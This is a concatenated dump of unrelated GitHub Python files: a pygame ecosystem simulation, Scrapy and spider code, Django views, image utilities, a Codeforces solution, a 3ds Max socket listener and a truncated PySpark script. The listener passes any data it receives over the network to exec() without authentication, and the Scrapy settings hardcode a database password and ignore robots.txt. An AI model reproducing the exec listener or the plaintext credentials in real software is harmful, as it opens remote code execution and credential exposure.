== \"DECOMPOSITEUR\":\n decompositeur.append(i)\n\n carnivore.sort(key=lambda x: x.dist, reverse=False)\n herbivore.sort(key=lambda x: x.dist, reverse=False)\n super_predateur.sort(key=lambda x: x.dist, reverse=False)\n decompositeur.sort(key=lambda x: x.dist, reverse=False)\n vegetal.sort(key=lambda x: x.dist, reverse=False)\n\n return carnivore, super_predateur, herbivore, decompositeur, vegetal\n\n def faireUnEnfant(self, a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p):\n core.memory('agents').append(Agent(a,\n b\n , c\n , d\n , e\n , f\n , g\n , h\n , i\n , j,\n k,\n l,\n m,\n n,\n o\n , p))\n\n def computeForce(self, preys, predators, friend):\n fuite = self.fuite(predators) * 2\n hunt = self.hunt(preys) * 1\n symbiose = self.symbiose(friend) * 2\n\n if fuite + hunt + symbiose == (0,0):\n self.body.acc += Vector2(random.randint(-5,5), random.randint(-5,5))\n else: self.body.acc = self.body.acc + hunt + fuite + symbiose\n\n def fuite(self, predators):\n steering = Vector2()\n if len(predators) > 0:\n prey = sorted(predators, key=lambda x: x.position.distance_to(self.body.position), reverse=True)[0]\n steering = prey.position + self.body.position\n return steering\n\n def symbiose(self, friends):\n steering = Vector2()\n if len(friends) > 0:\n prey = sorted(friends, key=lambda x: x.position.distance_to(self.body.position), reverse=True)[0]\n steering = prey.position - self.body.position\n return steering\n\n def hunt(self, preys):\n steering = Vector2()\n if len(preys) > 0:\n prey = sorted(preys, key=lambda x: x.position.distance_to(self.body.position), reverse=True)[0]\n steering = prey.position - self.body.position\n return steering\n\n def eat(self,preys):\n for p in preys:\n if p.position.distance_to(self.body.position) < 15:\n p.vivant = False\n p.statut = \"DEAD\"\n if p.statut == \"CARNIVORE\":\n self.body.timer_faim = pygame.time.get_ticks() # On regagne toute sa jauge secondes en mangeant\n if p.statut == \"HERBIVORE\":\n self.body.timer_faim -= 10000 # On gagne 10 secondes en mangeant un herbivore\n if p.statut == \"DECOMPOSITEUR\":\n self.body.timer_faim -= 3000 # On gagne 3 secondes en mangeant un decompositeur\n if p.statut == \"VEGETAL\":\n self.body.timer_faim -= 1000 # On gagne 1 secondes en mangeant un vegetal\n\n def update(self):\n\n carnivore, super_predateur, herbivore, decompositeur, vegetal = self.filtrePerception()\n\n if self.body.vivant:\n if self.body.endormi:\n self.body.vitesse = Vector2()\n elif self.body.statut == \"SUPER_PREDATEUR\":\n self.eat(list(itertools.chain(carnivore, decompositeur, vegetal)))\n self.computeForce(list(itertools.chain(carnivore, decompositeur, vegetal)), [], [])\n elif self.body.statut == \"CARNIVORE\":\n self.eat(list(itertools.chain(herbivore, decompositeur, vegetal)))\n self.computeForce(list(itertools.chain(herbivore, decompositeur, vegetal)), super_predateur, [])\n elif self.body.statut == \"HERBIVORE\":\n self.eat(list(itertools.chain(vegetal, decompositeur)))\n self.computeForce(list(itertools.chain(vegetal, decompositeur, vegetal)), carnivore, super_predateur)\n elif self.body.statut == \"DECOMPOSITEUR\":\n self.eat(vegetal)\n self.computeForce(vegetal, list(itertools.chain(super_predateur, carnivore, herbivore)), [])\n else:\n self.body.vitesse = Vector2()\n\n def show(self):\n self.body.show()\n","repo_name":"0domart/tp_interaction","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41178088814","text":"# -*- coding: utf-8 -*-\n\nBOT_NAME = 'firsttest'\nSPIDER_MODULES = ['firsttest.spiders']\nNEWSPIDER_MODULE = 'firsttest.spiders'\n\nROBOTSTXT_OBEY = False\n\nCONCURRENT_REQUESTS = 32\n\nDOWNLOAD_DELAY = 3\n# CONCURRENT_REQUESTS_PER_DOMAIN = 16\n# CONCURRENT_REQUESTS_PER_IP = 16\n\nCOOKIES_ENABLED = False\n\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\nDOWNLOADER_MIDDLEWARES = {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware':None,\n 'firsttest.middlewares.RotateUserAgentMiddleware':50,\n}\n\nITEM_PIPELINES = {\n # 'firsttest.pipelines.FirsttestPipeline': 300,\n # 'firsttest.pipelines.MyImagesPipeline': 400,\n 'firsttest.pipelines.DoubanmoviePipeline':600,\n # 'firsttest.pipelines.MongoDBPipeline':900,\n}\n\nAUTOTHROTTLE_MAX_DELAY = 60\n\nHTTPCACHE_ENABLED = True\nHTTPCACHE_EXPIRATION_SECS = 0\nHTTPCACHE_DIR = 'httpcache'\nHTTPCACHE_IGNORE_HTTP_CODES = []\nHTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n# CRITICAL、 ERROR、WARNING、INFO、DEBUG\nLOG_LEVEL = 'INFO'\n\nIMAGES_STORE='C:\\新建文件夹'\n# IMAGES_EXPIRES = 90 # 过期天数,90天内抓过的不再抓\n# IMAGES_MIN_HEIGHT = 110 # 过滤图片大小\n# IMAGES_MIN_WIDTH = 110\n\nMYSQL_HOST = '127.0.0.1'\nMYSQL_PORT = 3306\nMYSQL_DBNAME = 'world'\nMYSQL_USER = 'dhz'\nMYSQL_PASSWD = '666'\nMYSQL_CHARSET = 'utf8' # 编码要加上,否则可能出现中文乱码问题\n\nMONGODB_SERVER = 'localhost'\nMONGODB_PORT = 27017\nMONGODB_DB = 'yun'\nMONGODB_COLLECTION = 'coll'","repo_name":"chinesehuazhou/ScrapyProject","sub_path":"firsttest/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"4090800581","text":"\"\"\"\nThis script contains nodes containing functions for pipeline\n\"\"\"\nimport yaml\nfrom typing import Any, Callable, Dict, Tuple\nimport datasets\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\n#with open('conf/base/parameters.yml', 'r') as f:\n# params = yaml.safe_load(f)['parameters']\n\n\ndef download_reviews(parameters: Dict[str, Any]):\n \"\"\"\n Load the reviews dataset from the datasets library. \n and save in a csv file in data folder\n \n Args:\n parameters: parameters from parameters.yml file\n \n Returns:\n reviews: B2W reviews dataset from huggingface datasets library\n \"\"\" \n\n # load the dataset\n dataset = datasets.load_dataset(parameters['name'])\n return dataset[parameters['split']].to_pandas()\n\n\ndef drop_null_values(dataframe: pd.DataFrame, parameters: list) -> pd.DataFrame:\n \"\"\"\n Drop null values from the dataframe\n \n Args:\n dataframe: dataframe to be cleaned\n parameters: parameters from parameters.yml file\n \n Returns:\n dataframe: cleaned dataframe\n \"\"\"\n print(f\"Input data columns: {dataframe.columns}\")\n print(f\"Columns to drop nulls from: {parameters['columns']}\")\n cleaned_data = dataframe.dropna(subset=parameters['columns'])\n return cleaned_data\n\n\ndef clean_review(dataframe: pd.DataFrame, parameters: Dict[str, Any]) -> pd.DataFrame:\n \"\"\"Node for cleaning reviews text\n Args:\n dataframe: A pandas dataframe.\n parameters: A dictionary of parameters.\n Returns:,\n pd.DataFrame: The data from the node.\n \"\"\"\n dataframe[parameters['sentimentcolumn']] = [\n 'positivo' if x >= 4 else 'negativo' for x in dataframe[parameters['ratingcolumn']]\n ]\n dataframe[parameters['textcolumn']] = dataframe[parameters['textcolumn']].str.lower()\n dataframe[parameters['textcolumn']] = dataframe[parameters['textcolumn']].str.replace(r'[^\\w\\s]+', '')\n dataframe[parameters['textcolumn']] = dataframe[parameters['textcolumn']].str.replace(r'\\n', ' ') \n reviews = dataframe.dropna(subset=[parameters['textcolumn']])\n return reviews","repo_name":"bobcastaldeli/b2w_reviews","sub_path":"src/b2w_reviews/pipelines/data_engineering/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20043447549","text":"# urs/bin/python\r\n# encoding:utf-8\r\nimport time\r\nimport os,sys\r\nimport unittest\r\nfrom psam.psam import Psam\r\nfrom base.baseConversion import BaseConversion as bc\r\nsys.path.append(r'D:\\workspace\\workspace_python3\\appium_python\\src')\r\n\r\n\r\nfrom base.baseAdb import BaseAdb\r\n\r\n\r\nclass MyTestCase(unittest.TestCase):\r\n #脚本初始化,获取操作实例\r\n def setUp(self):\r\n BaseAdb.adbIntallUiautmator() \r\n self.driver = Psam()\r\n\r\n #释放实例,释放资源\r\n def tearDown(self): \r\n self.driver.quit()\r\n \r\n def testCase(self):\r\n time.sleep(5)\r\n BaseAdb.adbHome()\r\n time.sleep(2)\r\n print(\"测试\")\r\n self.driver.click(\"name=>设置\")\r\n self.scroll(\"name=>单手操作\")\r\n \r\n def scroll(self, txt):\r\n w = self.driver.get_window_size()['width']\r\n h = self.driver.get_window_size()['height']\r\n \r\n while True:\r\n \r\n el = self.driver.element_wait(txt, 2)\r\n if el != None:\r\n y = el.location['y']\r\n if bc.round(float(y/h), 2) > 0.8 :\r\n self.driver.swipe(w/2, y*0.8, w/2, y*0.5, 1000)\r\n break\r\n \r\n else:\r\n \r\n self.driver.swipeUp()\r\n \r\n \r\nif __name__ == '__main__':\r\n suite = unittest.TestSuite()\r\n suite.addTest(MyTestCase('testCase'))\r\n runner = unittest.TextTestRunner(verbosity=2)\r\n runner.run(suite)\r\n\r\n\r\n","repo_name":"hi-cbh/pytest","sub_path":"src/testcode/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"626831087","text":"# -*- coding: utf-8 -*-\nfrom gevent.pool import Pool\nfrom db import mondb\nimport gevent\nimport requests\nimport logging\nimport lxml.html\nimport time\ntry:\n import ujson as json\nexcept ImportError:\n import json\n\nimport re\n\nlogger = logging.getLogger(__name__)\nnow_date = lambda: time.strftime(\"%Y-%m-%d %X\")\n\n\nclass BlogSpider(gevent.Greenlet):\n \n _headers = {}\n \n def __init__(self, **options):\n '''初始化配置\n : 必须配置: src, url, pool_size => _src, _url, _pool_size\n @param url: eg: 'http://www.oschina.net/search?q=python&scope=blog&sort_by_time=1&p=%s'\n '''\n names = ['src', 'url', 'pool_size']\n [setattr(self, '_%s' % name, options[name]) for name in names] \n \n self._max_page = options.get('max_page') or 50\n self._headers.update(options.get('headers', {}))\n self._pool = Pool(size=self._pool_size)\n self._handle = None\n \n gevent.Greenlet.__init__(self)\n \n def exist(self, link):\n '''数据库中是否存在该blog,根据blog的原链接\n @param link: 原链接\n '''\n return mondb.blog.find_one({'link':link}, {'_id':1}) is not None\n \n def page_n(self, n):\n url = self._url % (n,)\n try:\n r = requests.get(url, headers=self._headers, timeout=20)\n except:\n logger.warn('%s parse except', url, exc_info=1)\n return\n \n if r.status_code in [200, ]:\n return r\n \n def oschina_parse_page(self, r):\n '''解析oschina page\n '''\n assert r.encoding.upper() == 'UTF-8'\n \n try:\n html = lxml.html.fromstring(r.text) # r.content\n ul = html.xpath('//*[@id=\"results\"]')[0]\n except:\n logger.warn('ul xpath parse except', exc_info=1)\n raise StopIteration\n \n for li in ul:\n try:\n link = li.find('h3/a').attrib['href']\n title = li.find('h3/a').text_content()\n summary = li.find('p[2]').text_content()\n date = li.find('p[3]').text_content().split()[0]\n author = li.find('p[3]/a').text_content()\n except:\n logger.warn('li xpath parse except', exc_info=1)\n raise StopIteration\n \n if self.exist(link):\n raise StopIteration\n \n yield (title, link, date, author, summary)\n \n def csdn_parse_page(self, r):\n '''解析csdn page\n '''\n assert r.encoding.upper() == 'UTF-8'\n \n try:\n html = lxml.html.fromstring(r.text) # 这里用r.content会乱码\n try:\n raw = html.xpath('//script[13]/text()')[0] # 不适用老版本lxml\n except:\n logger.warn('need latest lxml')\n raw = html.xpath('//script')[12].text\n data = re.findall(r'\\r\\nvar data = (.+);\\r\\n', raw)[0]\n data = json.loads(data)\n except:\n logger.warn('raw xpath parse except', exc_info=1)\n raise StopIteration\n \n ul = data['result']\n for li in ul:\n try:\n link = li['url']\n title = li['title']\n summary = ''\n date = time.strftime(\"%Y-%m-%d\",\n time.localtime(time.mktime(time.strptime(li['created_at'], '%Y%m%d%H')))\n )\n author = li['user_name']\n except:\n logger.warn('li dict data except', exc_info=1)\n raise StopIteration\n \n if self.exist(link):\n raise StopIteration\n \n yield (title, link, date, author, summary)\n \n def save(self, title, link, date, author, summary):\n blog = {'src':self._src,\n 'title':title,\n 'link':link,\n 'date':date,\n 'author':author,\n 'summary':summary,\n 'spider_date':now_date()\n }\n mondb.blog.insert(blog)\n \n def parse(self, i):\n r = self.page_n(i)\n if not r: return\n for title, link, date, author, summary in self._handle(r):\n logger.info('insert to %s mongo title: %s', self._src, repr(title))\n self.save(title, link, date, author, summary)\n \n def crawling(self):\n self._handle = getattr(self, '%s_parse_page' % self._src, None)\n assert self._handle is not None\n \n self._pool.map(self.parse, xrange(1, self._max_page + 1))\n \n def _run(self):\n self.crawling()\n","repo_name":"gf0842wf/spider-blog","sub_path":"spider/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"30994077002","text":"from django import template\nfrom django.utils.html import format_html\nregister = template.Library()\n\n@register.filter\ndef as_icon(value):\n icons = {True: \"ok\",\n False: \"remove\",\n None: \"asterisk\"\n }\n if not value in icons:\n raise ValueError(value, 'is not a boolean or empty value !')\n else:\n return format_html('', icons[value])\n","repo_name":"artus40/maraudes_project","sub_path":"website/templatetags/boolean_icons.py","file_name":"boolean_icons.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1822990703","text":"\"\"\"\nfunctions for deterministically preprocessing images mostly for the\nconsumption of computer vision algorithms\n\"\"\"\n\nfrom __future__ import division, absolute_import\nfrom __future__ import print_function, unicode_literals\n\n\nimport math\nimport numpy as np\nfrom scipy import ndimage\nimport PIL\n\nfrom .. import numpy_utils\n\n\ndef get_block_with_corner_and_shape(data, corner, shape, fill_value=0):\n \"\"\"\n takes the block with the given top corner and shape from the input data\n if the input data block is too small, pad it with the provided fill value\n \"\"\"\n assert isinstance(shape, tuple), shape\n assert len(shape) == len(data.shape), {\n \"shape\": shape,\n \"data.shape\": data.shape,\n }\n\n maxed_corner = [max(0, c) for c in corner]\n slices = [slice(mc, c + size)\n for c, mc, size in zip(corner, maxed_corner, shape)]\n # index with tuple allows slice to work with hdf5 dataset\n sliced = data[tuple(slices)]\n if sliced.shape == shape:\n res = sliced\n else:\n res = numpy_utils.constant_value_array(fill_value, shape, data.dtype)\n inner_slices = [\n slice(mc - c, mc - c + s)\n for c, mc, s in zip(corner, maxed_corner, sliced.shape)\n ]\n res[tuple(inner_slices)] = sliced\n assert res.shape == shape, dict(\n res_shape=res.shape,\n desired_shape=shape,\n sliced_shape=sliced.shape,\n slices=slices\n )\n return res\n\n\ndef get_block_with_center_and_shape(data, center, shape, fill_value=0):\n \"\"\"\n takes the block with a given shape from the input data block at the\n given center. if the input data block is too small, pad it with the\n provided fill value\n \"\"\"\n # validate that center is in data\n for idx, (limit, coord) in enumerate(zip(data.shape, center)):\n assert 0 <= coord < limit, dict(\n idx=idx,\n limit=limit,\n coord=coord,\n data_shape=data.shape,\n center=center\n )\n corner = [c - size // 2 for c, size in zip(center, shape)]\n return get_block_with_corner_and_shape(data=data,\n corner=corner,\n shape=shape,\n fill_value=fill_value)\n\n\ndef take_center_block(data, shape, fill_value=0):\n \"\"\"\n takes the center block of the given data block, with the given shape\n \"\"\"\n if data.shape == tuple(shape):\n return data\n center = tuple([s // 2 for s in data.shape])\n return get_block_with_center_and_shape(data,\n center=center,\n shape=shape,\n fill_value=fill_value)\n\n\ndef rescale(data, zoom_factor):\n \"\"\"\n Up or down sample by a given factor\n \"\"\"\n return ndimage.interpolation.zoom(input=data, zoom=zoom_factor)\n\n\ndef _rotate(data, radians, axes, reshape, mode):\n return ndimage.rotate(input=data,\n angle=math.degrees(radians),\n axes=axes,\n mode=mode,\n reshape=reshape)\n\n\ndef rotate(data, radians, axes=(1, 0), mode=\"reflect\"):\n \"\"\"\n rotates around the center and returns an image of the same size as the\n input image - this means that some amount of the input image is\n excluded (the corners)\n\n Parameters\n ----------\n data : ndarray\n\n radians : int\n number of radians to rotate the data\n\n axes : tuple of integers (default=(1, 0))\n pair that specifies which axes to rotate over\n \"\"\"\n return _rotate(data, radians, axes, False, mode)\n\n\ndef rotate_take_center(data, radians, shape, axes=(1, 0), mode=\"reflect\"):\n \"\"\"\n rotates around the center and returns an image of the given size from\n the center of the rotated image\n\n Parameters\n ----------\n data : ndarray\n\n radians : int\n number of radians to rotate the data\n\n shape : tuple of integers\n desired shape of the output data\n\n axes : tuple of integers (default=(1, 0))\n pair that specifies which axes to rotate over\n \"\"\"\n rotated = _rotate(data, radians, axes, True, mode)\n return take_center_block(rotated, shape)\n\n\ndef rotate_multi(data, rotations, mode=\"reflect\"):\n \"\"\"\n perform multiple rotations in a row, 1 for each pair of axes\n\n rotations:\n a map from the indexes of the axes to rotate over to radians to rotate\n eg. {(1, 0): 0.1, (2, 0): 0.2}\n\n TODO:\n Seems like this should be done with a single affine transform. Can just\n create rotation matrices for each rotation you want, then multiply those\n together and apply the result. For 3d images, would be nice to not\n reprocess multiple times.\n \"\"\"\n tmp = data\n for axes, radians in rotations.items():\n tmp = rotate(tmp, radians, axes, mode=mode)\n return tmp\n\n\ndef strided_downsample(data, downsample_factors, offsets=0):\n \"\"\"\n downsamples an image by taking every few pixels (pros: very fast, cons:\n low quality / might lead to aliasing)\n\n downsample_factors:\n int or tuple/list of factors to downsample by in each dimension\n\n offsets:\n int or tuple/list of offset locations for where downsampling begins from\n \"\"\"\n if isinstance(downsample_factors, int):\n downsample_factors = (downsample_factors,) * len(data.shape)\n if isinstance(offsets, int):\n offsets = (offsets,) * len(data.shape)\n return data[tuple([slice(offset, None, stride)\n for offset, stride in zip(offsets, downsample_factors)])]\n\n\ndef resize_antialias(img, shape):\n \"\"\"\n resizes an image in a way to reduce the effect of aliasing\n\n NOTE: doesn't seem to work when img has channels\n\n img:\n img must be of type float32 or float64, and returns an image of type\n float32\n \"\"\"\n return np.array(PIL.Image.fromarray(img).resize(shape,\n PIL.Image.ANTIALIAS))\n","repo_name":"diogo149/du","sub_path":"du/preprocessing/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3392667658","text":"import pygame\nfrom settings import *\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, angle, vector):\n super().__init__()\n self.image = pygame.image.load('data/Bullet.png').convert_alpha()\n self.rect = self.image.get_rect(midleft=(x, y))\n self.image = pygame.transform.rotate(self.image, angle)\n self.speed = 30\n self.direction = vector.normalize()\n\n def update(self):\n self.rect.center += self.direction * self.speed\n if self.rect.centerx > WIDTH or self.rect.centerx < 0 or self.rect.centery > HEIGHT or self.rect.centery < 0:\n self.kill()\n","repo_name":"Boussenard/Gunner_game","sub_path":"code/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18478827699","text":"from django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom .models import Lots\nfrom artists.models import Artist\nfrom .forms import LotsForm\nimport json\n\n@login_required\ndef lots_list(request):\n lots = Lots.objects.all()\n context = {'items': lots}\n return render(request, 'lots_list.html', context)\n\n\n@login_required\ndef create_lot(request):\n form = LotsForm(request.POST or None)\n if form.is_valid():\n us = request.user\n obj = form.save(commit=False)\n obj.created_by = us\n form.save()\n form = LotsForm()\n return render(request, 'create_lots.html', {'form': form})\n\n@login_required\ndef update_lot(request, slug):\n instance = get_object_or_404(Lots, slug=slug)\n form = LotsForm(request.POST or None, instance=instance, initial={'artist_display': instance.artist})\n # form = LotsForm(initial={'artist_display': ar}, instance=instance)\n if form.is_valid():\n us = request.user\n obj = form.save(commit=False)\n # artist_name = form.cleaned_data[\"artist\"]\n # obj.artist, created = Artist.objects.get_or_create(name=artist_name)\n obj.modified_by = us\n form.save()\n return render(request, 'lots_list.html', {})\n return render(request, 'lots_update.html', {'form': form})\n\n\n@login_required\ndef artist_auto_complete(request):\n q = request.GET.get('term', '')\n # users = User.objects.filter(is_active=True)\n users = Artist.objects.filter(Q(name__icontains=q) | Q(bio__icontains=q))\n users_list = []\n\n for u in users:\n value = '%s, %s' % (u.name, u.bio)\n u_dict = {'id': u.id, 'label': value, 'value': value}\n users_list.append(u_dict)\n data = json.dumps(users_list)\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n@login_required\ndef detail_lot(request, slug):\n q = Lots.objects.filter(slug__iexact=slug)\n if q.exists():\n q = q.first()\n else:\n return HttpResponse('

    Post Not Found

    ')\n context = {\n 'post': q,\n }\n return render(request, 'lot_detail.html', context)\n","repo_name":"godjira-homless/artplein","sub_path":"lots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69905089194","text":"def middle_class(n, x, input_array):\n input_array.sort()\n current_sum = total_rich = 0\n for i in range(n-1, -1, -1):\n current_sum += input_array[i]\n current_avg = float(current_sum) / float(n - i)\n if current_avg >= x:\n total_rich += 1\n else:\n break\n return total_rich\n\n\nif __name__ == \"__main__\":\n t = int(input())\n results = list()\n for i in range(0, t):\n n, x = map(int, input().split(\" \"))\n input_array = list(map(int, input().split(\" \")))\n results.append(middle_class(n, x, input_array))\n for result in results:\n print(result)","repo_name":"I-Atlas/learning","sub_path":"src/Python/Codeforces/1334B.py","file_name":"1334B.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34148588977","text":"\"\"\"\nListens for network communication from MaxScript.\n\nFrom:\n\thttp://techarttiki.blogspot.com/2009/12/maxscript-dotnet-sockets-with-python.html\n\nThanks to all who posted in the \"dotNet + MXS\" thread on CGTalk.\n\thttp://forums.cgsociety.org/showthread.php?f=98&t=551473\nThe info there put me on the right trail to making this work.\n\nAdam Pletcher, Technical Art Director, Volition/THQ\n\tadam.pletcher@gmail.com\n\thttp://techarttiki.blogspot.com\n\thttp://www.volition-inc.com\n\"\"\"\n\nimport wx\nimport wx.lib.newevent\n\nimport socket\nimport threading\n\nclass Socket_Listen_Thread( threading.Thread ):\n\t\"\"\"\n\tCreates a socket listener on a separate thread. Useful for listening for updates in\n\ta wx tool, leaving it free in the main loop to process the UI main loop.\n\n\t*Arguments:*\n\t\t* ``window``\t\tThe window object for the tool. Typically this is the frame, or \"self\".\n\t\t* ``event_class``\tThe class of the custom wx event to post when a socket update is received.\n\n\t*Keyword Arguments:*\n\t\t* ``port``\t\t\tTCP/IP port to listen on.\n\t\t* ``buffer_size``\tSize of data buffer to read from socket. Generally you want this to be\n\t\t\t\t\t\t\t\ta power of two, larger than the largest data message you'll receive.\n\t\"\"\"\n\tdef __init__( self, port = 5432, buffer_size = 512 ):\n\t\tthreading.Thread.__init__( self )\n\n\t\t# Window to post event to later\n\t\t# self.window = window\n\t\t# self.event_class = event_class\n\t\tself.buffer_size = buffer_size\n\t\tself.data_ = \"\"\n\n\t\t# Set up our socket\n\t\tself.socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM )\n\t\tself.socket.bind( ( '', port ) )\n\t\tself.socket.listen( 5 )\n\t\tself.socket.setblocking( False )\n\n\t\tself.running = False\n\n\tdef run( self ):\n\t\tself.running = True\n\n\t\twhile ( self.running ):\n\t\t\t# Starting server...\n\t\t\t# Listen for connection. We're in non-blocking mode so it can\n\t\t\t# check for the signal to shut down from the main thread.\n\t\t\ttry:\n\t\t\t\tclient_socket, clientaddr = self.socket.accept( )\n\t\t\t\tdata_received = True\n\t\t\texcept socket.error:\n\t\t\t\tdata_received = False\n\n\t\t\tif ( data_received ):\n\t\t\t\t# Set new client socket to block. Otherwise it will inherit\n\t\t\t\t# the non-blocking mode of the server socket.\n\t\t\t\tclient_socket.setblocking( True )\n\n\t\t\t\t# Connection found, read its data then close\n\t\t\t\tdata = client_socket.recv( self.buffer_size )\n\t\t\t\tclient_socket.close( )\n\n\t\t\t\t# Create wx event and post it to our app window\n\t\t\t\t# event = self.event_class( data = data )\n\t\t\t\t# wx.PostEvent( self.window, event )\n\t\t\t\t# self.data_ = data\n\t\t\t\t# print data\n\t\t\t\texec(data)\n\n\n\tdef stop( self ):\n\t\tself.running = False\n\n\t\tif ( self.socket ):\n\t\t\tself.socket.close( )\n\n\n# class Tool_Frame( wx.Frame ):\n# \t\"\"\"\n# \t\"\"\"\n# \tdef __init__( self, parent, title ):\n# \t\twx.Frame.__init__( self, parent, -1, title, pos=(150, 150), size=(350, 100) )\n# \t\tself.SetBackgroundColour( ( 200,200,200 ) )\n\n# \t\t# Create a new Event class and a EVT binder function\n# \t\t( Max_Update_Event, EVT_3DS_MAX_UPDATE ) = wx.lib.newevent.NewEvent( )\n\n# \t\t# CONTROLS\n# \t\tself.st_text1\t\t= wx.StaticText( self, -1, \"Selected Objects:\" )\n# \t\tself.tc_obj_names = wx.TextCtrl( self, -1, '', size=(300, -1) )\n\n# \t\tself.main_sizer = wx.BoxSizer( wx.VERTICAL )\n\n# \t\tself.main_sizer.Add( self.st_text1, 0, wx.ALL, 5 )\n# \t\tself.main_sizer.Add( self.tc_obj_names, 0, wx.ALL, 5 )\n\n# \t\t# Create instance of our listener thread, and start it running\n# \t\tself.max_monitor = Socket_Listen_Thread( self, Max_Update_Event )\n# \t\tself.max_monitor.start( )\n\n# \t\t# EVENT BINDINGS\n# \t\tself.Bind( wx.EVT_CLOSE, self.on_close )\n\n# \t\t# Bind handler to our custom event\n# \t\tself.Bind( EVT_3DS_MAX_UPDATE, self.on_3ds_max_update )\n\n# \t\t# FINAL SETUP\n# \t\tself.SetSizer( self.main_sizer )\n# \t\tself.Layout( )\n\n# \tdef on_3ds_max_update( self, event ):\n# \t\t\"\"\"\n# \t\tEvent handler for our custom Max_Update_Event, setting the text control's\n# \t\tvalue to the data received. Which in this case is a string containing the names\n# \t\tof the objects selected in 3ds Max.\n# \t\t\"\"\"\n# \t\tself.tc_obj_names.SetValue( event.data )\n\n# \tdef on_close( self, event ):\n# \t\t\"\"\"\n# \t\tTells the listener thread to stop, then unregisters the Max callback.\n# \t\t\"\"\"\n# \t\t# Stop the socket listening thread\n# \t\tself.max_monitor.stop( )\n\n# \t\tself.Destroy( )\n\n### MAIN ###\nif (__name__ == '__main__'):\n\t# wx_app = wx.App( redirect=False )\n\n\t# frame\t= Tool_Frame( None, 'Test Frame' )\n\n\t# frame.Show( True )\n\t# wx_app.MainLoop( )\n\n\ts = Socket_Listen_Thread()\n\ts.start()\n\t# s.stop()\n\n","repo_name":"nguyenvuducthuy/thuy_maxLibs","sub_path":"tcpSocket/python_listener.py","file_name":"python_listener.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15161718759","text":"r,b = 0,0\nn = int(input())\nfor _ in range(n):\n s = input()\n for c in s:\n if c == 'R':\n r += 1\n elif c == 'B':\n b += 1\nif r == b:\n print('DRAW')\nelif r > b:\n print('TAKAHASHI')\nelse:\n print('AOKI')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc040/A/4426412.py","file_name":"4426412.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"12154578608","text":"import sys\nimport pandas as pd\nfrom pyspark.sql import SparkSession, functions, types\nfrom pyspark.sql.window import Window\nfrom pyspark.sql import DataFrameStatFunctions as statFunc\nfrom pyspark.sql.functions import col\n\n\nspark = SparkSession.builder.appName('extract interesting amenities').getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\n\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\nassert spark.version >= '2.3' # make sure we have Spark 2.3+\n\namenities_schema = types.StructType([\n types.StructField('lat', types.FloatType()),\n types.StructField('lon', types.FloatType()),\n types.StructField('timestamp', types.TimestampType()),\n types.StructField('amenity', types.StringType()),\n types.StructField('name', types.StringType()),\n # types.StructField('tags', types.ArrayType(types.StringType())), # not sure which of these works\n types.StructField('tags', types.MapType(types.StringType(), types.StringType()))\n])\n\ndef print_shape(dataframe):\n print(\"(\" + str(dataframe.count()) + \", \" + str(len(dataframe.columns)) + \")\")\n \n \ndef extract_wikidata_id(tags):\n # Input: tags field of amenities\n if tags == {}:\n return None\n for tag in tags:\n if \"wikidata\" in tag:\n return tags[tag]\n return None\n\ndef main(in_directory):\n # Load data\n amenities = spark.read.json(in_directory, schema=amenities_schema)\n print(\"amenities:\")\n print_shape(amenities)\n amenities.show()\n \n extract_wiki_tag_udf = functions.udf(lambda x:extract_wikidata_id(x), returnType=types.StringType())\n amenities = amenities.withColumn(\"wikidata_id\", extract_wiki_tag_udf(amenities.tags))\n # print_shape(amenities)\n # amenities.show()\n \n amenities = amenities.na.drop()\n # print_shape(amenities)\n # amenities.show()\n \n unique_wikidata_ids = amenities.groupBy('wikidata_id').count()\n print(\"unique_wiki_id:\")\n print_shape(unique_wikidata_ids)\n unique_wikidata_ids.show()\n \n threshold = 